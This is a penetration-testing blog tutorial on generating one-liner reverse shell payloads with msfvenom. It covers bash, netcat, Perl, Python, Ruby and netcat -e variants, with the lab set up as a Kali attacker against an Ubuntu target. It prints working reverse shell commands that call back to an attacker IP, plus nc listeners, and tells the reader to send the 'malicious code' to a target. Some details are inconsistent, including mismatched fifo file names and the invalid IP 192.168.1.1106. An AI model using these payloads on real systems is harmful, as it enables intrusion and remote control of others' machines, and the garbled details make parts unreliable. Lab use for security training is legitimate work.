Categories

Archives

Kali Linux, Penetration Testing

Generating Reverse Shell using Msfvenom (One Liner Payload)

Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using single line payload which is also known as stagers exploit that comes in Metasploit.

Basically, there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired terminal on a serial connection connected to mouse or keyboard and PTs is sudo tty terminal, to get the copy of terminals on network connections via SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open the terminal in your Kali Linux and type msfconsole to load Metasploit framework, now search all one-liner payloads for UNIX system using search command as given below, it will dump all exploit that can be used to compromise any UNIX system.

search cmd/unix

From given below image you can observe that it has dumped all exploit that can be used to be compromised any UNIX system. In this tutorial, we are going to use some of the payloads to spawn a TTY shell.

Bash Shell

In order to compromise a bash shell, you can use reverse_bash  payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_bash

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 1111 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 67 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTy shell.

For example when the target will open

0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121>

malicious code in terminal, the attacker will get a reverse shell through netcat.

nc -lvp 1111

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell, now he can do whatever he wishes to do.

For example:

whoami: it tells you are the root user of the system you have compromised.

Netcat Shell

In order to compromise a netcat shell, you can use reverse_netcat payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_netcat

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 2222 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 104 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

when the target will open

mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admsozx | /bin/sh >/tmp/admson 2>&1; rm /tmp/admoszx )

malicious code in terminal, the attacker will get a reverse shell through netcat.

nc -lvp 2222

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell.

Perl shell

In order to compromise a Perl shell, you can use reverse_perl payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_perl

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 3333 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 232 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Now again when the target will open malicious code in terminal, the attacker will get a reverse shell through netcat.

nc -lvp 3333

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell. Here we found target IP address: 192.168.1.1106 by executing the ifconfig command in his TTY shell.

Python Shell

In order to compromise a python shell, you can use reverse_Python payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_python

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 4444 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open the following malicious code in his terminal, the attacker will get the reverse shell through netcat.

nc -lvp 4444

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell, now he can do whatever he wishes to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Ruby Shell

In order to compromise a ruby shell, you can use reverse_ruby payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_ruby

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 5555 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 131 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open 

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

malicious code in his terminal, the attacker will get a reverse shell through netcat.

nc -lvp 5555

As you can observe the result from given below image where the attacker has successfully accomplish targets system TTY shell, now he can do whatever he wishes to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Netcat Gaping (Traditional)

In order to compromise a command shell, you can use reverse_netcat_gaping payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

 Here we had entered the following detail to generate one-liner raw payload.

-p: type of payload you are using i.e. cmd/unix/reverse_netcat_gaping

lhost: listening IP address i.e. Kali Linux IP

lport: Listening port number i.e. 6666 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in the below image, the size of the generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

In order to access /bin/sh shell of the target system for compromising TTY shell firstly, we had access PTs terminal  of the target through SSH and then paste the malicious code

nc 192.168.1.103 6666 -e /bin/sh

nc -lvp 6666

From given below image you can observe that we had successfully access TTY shell of the target system.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

One thought on “Generating Reverse Shell using Msfvenom (One Liner Payload)

Comments are closed.